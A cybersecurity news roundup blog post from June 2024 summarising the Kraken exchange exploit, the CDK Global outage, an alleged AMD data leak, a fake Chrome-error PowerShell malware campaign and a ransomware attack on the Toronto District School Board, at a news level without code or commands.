Kraken Flaw Heist, CDK Cyberattack Hits, AMD Investigates Breach – Cybersecurity News [June 17, 2024]

by DuoCircle

 

Don’t miss out on the latest cybersecurity scoop of the week! We’ll be covering the $3 million stolen from Kraken, the cyberattack that has affected thousands of US car dealerships, the AMD data leakage, fake Chrome errors installing malware on devices, and the cyberattack on the Toronto District School Board. 

 

“Researchers” Use Kraken Exchange Flaw to Steal $3 Million in Cryptocurrency

The popular Kraken crypto exchange shared this week that alleged security researchers stole $3 million in crypto by exploiting a zero-day bug in its website. 

The hack was disclosed by the Chief Security Officer for Kraken, Nick Percoco, who shared that the security team received a vague bug report on 9 June about a zero-day bug that anyone could use to increase the balances of their wallets.

By leveraging this bug, threat actors could initiate deposits, and even when the deposit failed, they would still receive the funds in their Kraken wallet. The bug was isolated and fixed within an hour by the security team, who also found out that it came from a recent change in the UI (User Interface), which allowed users to deposit funds and use them before clearance.

But by the time the bug was fixed, three individuals had already exploited it and stolen $3 million from the Kraken treasury, one of whom claimed to be a researcher and said he deposited just $4 to his account to prove that the bug indeed worked and could be misused by threat actors.

This researcher also refused to return the $4 or any information regarding the bug and instead demanded a call with the sales reps. Also, he said that he would return the funds once the team provided a speculated amount that the bug could have caused if the breach went undisclosed.

Kraken termed it “extortion,” but has not disclosed the identity of this researcher. They are treating this incident as a criminal case and have notified law enforcement authorities.

 

 

CDK Global Cyberattack Affects Thousands of US Car Dealerships

This week, the car dealership Saas (Software as a Service) provider CDK Global was the victim of a significant cyberattack and had to shut down all systems.

 

Cybercrime Statistics

All of CDK Global’s clients suffered as they could not run their businesses normally, which includes over 15,000 car dealerships in North America. The organization had to shut down all IT systems, phones, and applications to contain the attack. The details of the attack have not yet been shared by any spokesperson, but the organization is assessing the impact of the breach.

In the meantime, many employees have started a subreddit, explaining that all tracking systems for car parts, sales, and even financing are down, so they are forced to switch to traditional pen-and-paper systems. Some dealerships even sent the employees home. There has been no official statement at this point, but it looks like a ransomware attack, and if it is one, it will likely go on for quite some time. 

CDK says they are investigating the cyber incident and have shut down most of their systems. However, CDK phones, DMS, and Digital Retail, along with Unify and DMS logins are working now and the organization is running tests on other applications. If found safe, they will be bought back online. 

 

AMD Looks Into Breach After Data Appears for Sale on Hacking Forum

In other news, AMD is also investigating a cyberattack after a hacker put alleged stolen data from the organization on a hacking forum.

The threat actor posted a sample that contains AMD employee information and financial and confidential data from the organization. AMD is working with law enforcement and third parties to investigate the incident and find out the significance of the data sample posted online.

 

data breach

 

IntelBroker, the threat actor behind the attack, posted screenshots of this stolen data. They did not share how they got to the data but did share that they are selling information from AMD.com’s data breach. The incident was first reported by DarkWebInformer on X, who also shared that the data set includes information about employee user IDs, their first and last names, job functions, emails, employment status, and business contact numbers

It still remains to be seen if the data is from a new breach or a previous one, but IntelBroker is a major threat actor who also breached the DC Health Link that exposed personal information about members and staff of the US House of Representatives. 

 

Fake Google Chrome Errors Deceive Users Into Running Harmful Powershell Scripts

There’s a new malware distribution that uses fake Google Chrome, OneDrive, and MS Word errors to trick people into running PowerShell fixes that are actually malicious malware installing scripts

It is being used by many threat actors where the errors prompt the victims to click on a button that will copy a PowerShell “fix” and run it on the Run dialog. The campaign was discovered by ProofPoint, who shared that the attack chain is successful as it shows a real problem and solution at the same time, prompting users to take action.

The PowerShell script is malicious indeed and installs many infamous backgates like Matanbuchus, NetSupport, XMRig, Lumma Stealer, and DarkGate. ProofPoint analyzed three different attack chains. In the first one, the threat actors lead the victims to a malicious script hosted on BSN (Binance Smart Chain) and show a fake Google Chrome warning, prompting the victim to install a root certificate by copying the PowerShell script, but when it executes, it downloads the payloads.

 

Fake Google Chrome Errors

 

In the other one, the threat actors use injection on compromised websites to overlay the fake Google Chrome error. The third one is email-based, where the threat actors distribute HTML attachments that appear as MS Word documents, and they prompt users to install “Word Online” to view them. Here, the PowerShell command downloads and executes MSI or VBS files and installs the Matanbuchus or DarkGate infection on the victim device.

The different attack patterns that are being used by the threat actors behind it are highly effective, so you need to keep an eye out for such unsolicited errors and documents and avoid interacting with them to stay safe. Ensuring robust malware protection can also help mitigate these risks.

 

Ransomware Attack Targets Toronto District School Board

The TDSB (Toronto District School Board) shared that it suffered a ransomware attack this week. 

TDSB is one of Canada’s largest school boards, and the attack was on its software testing environment. The board notified parents and guardians via an announcement that an unauthorized third party was able to access TDSB’s tech testing environments, and the board is conducting an investigation into the issue to understand the nature of the incident, the impact, and if any information was affected.

 

Ransomware Attack

 

All of these systems are operational, and none of them were disrupted, but they were able to contain the attack. They have also notified the police service and are working with third-party cybersecurity experts. TDSB has nearly 40,000 employees and serves about 247,000 students so any information leak would impact a ton of people. 

There isn’t much information about the breach available but the TDSB says they will notify all affected individuals if there’s evidence of a data breach. It’s important to note that they are also focusing on improving their ransomware protection measures.

Pin It on Pinterest

Share This